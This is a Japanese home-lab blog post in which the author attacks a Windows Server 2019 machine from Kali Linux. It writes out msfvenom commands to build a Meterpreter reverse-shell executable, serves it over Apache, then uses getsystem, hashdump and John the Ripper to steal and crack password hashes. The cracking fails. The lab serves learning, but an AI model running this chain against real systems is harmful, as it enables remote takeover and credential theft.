参考文献:IPUSIRON著「ハッキング・ラボのつくりかた」
今回は上記書籍を参考にMetasploitとJohn The Ripperというツールを使って
Kali LinuxからリモートのWindows2019のパスワードハッシュを奪取して
ハッシュ解析を試みてみました。
1.環境
Kali Linux:192.168.0.15
Windows2019:192.168.0.25
2.手順
Kali側での操作
Metasploitの起動
msfconsole
show exploits
search type:payload reverse_tcp platform:windows
8 payload/windows/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection),
Reverse TCP Stager
55 payload/windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64),
Windows x64 Reverse TCP Stager
で2種類ありますが、対象が64bitなのでx64の方を使用します。
evil64.exeの作成
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.15 -f exe -o /root/evil64.exe
cd /var/www/html
mkdir share
cp /root/evil64.exe share
chmod -R 755 share
service apache2 restart
Windows側から下記にアクセス
http://192.168.0.15/share/

evil64.exeが閲覧できることを確認する。
Kali側での操作
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.0.15
↑KaliのIPを指定します。
show options
LPORT 4444なのでport4444で待ち受けることがわかります。
exploit
Windows2019側の操作
http://192.168.0.15/share/ にアクセスして、evll64.exeをダウンロードして、Wクリックする。
Kali側でWindowsの操作ができるようになります。
Windowsのパスワードハッシュの取得
getuid
getsystem -t 1
getuid
run hashdump
run post/windows/gather/smart_hashdump GETSYSTEM=true

cp -p /root/.msf4/loot/20201231060733_default_192.168.0.25_windows.hashes_689472.txt /root/hash2.txt
john --wordlist=/usr/share/john/password.lst --format:NT hash2.txt
john --show --format:NT hash2.txt

Administratorのパスワードが空で表示されてしまいます。
著者のIPUSIRONさんにアドバイスを頂いて、下記も試すが結果変わらず。
rm /root/.john/john.pot
john --wordlist=/usr/share/john/password.lst hash2.txt
john --show hash2.txt
john --show --format:LM hash2.txt

https://www.mbsd.jp/blog/20190514.html
↑の記事より、2016年のWindows10 1607以降でNTLMのハッシュ暗号化方式がRC4からAESに変更になった為、
今のバージョンのmetasploitではWindows2019のハッシュ値が正しく取得できていないのではと思いました。
ハッシュ値が正しく取得できれば、john the ripperでハッシュ値からパスワードが解析できるようになるのではと思いました。
著者のIPUSIRONさんさんより今事象の見解を頂きました。
「コマンドにミスがなければ、以下のいずれかの可能性が高いと思いました。
①Windows Server 2019から正しい形でパスワードハッシュをダンプできていない。
②John the Ripperが(2019の)パスワードハッシュに非対応。
2019(あるいは新バージョン)で新しい仕組みになっていれば特に。
実際に試していないので何ともいえませんが、先のツイートで提示していただいたURLを読むと、①の可能性があるかもしれませんね。
②の可能性であれば、Johnのバージョンが上がれたうまくいくことが期待できる。
また、別のパスワードクラッカーでうまくいくかもしれないと思いました。
↓hashcatが対応しているパスワードハッシュの形式
https://hashcat.net/wiki/doku.php?id=example_hashes
①、②どちらかの理由でWindows2019のパスワード解析は現時点(2020/12/31)では
出来ないようです。」
3.まとめ
Win2019でのパスワード解析は失敗に終わりましたが、
何故できないのか?を調べる過程は良い経験になりました。
次は書籍通りにWin7で試してみたいと思います。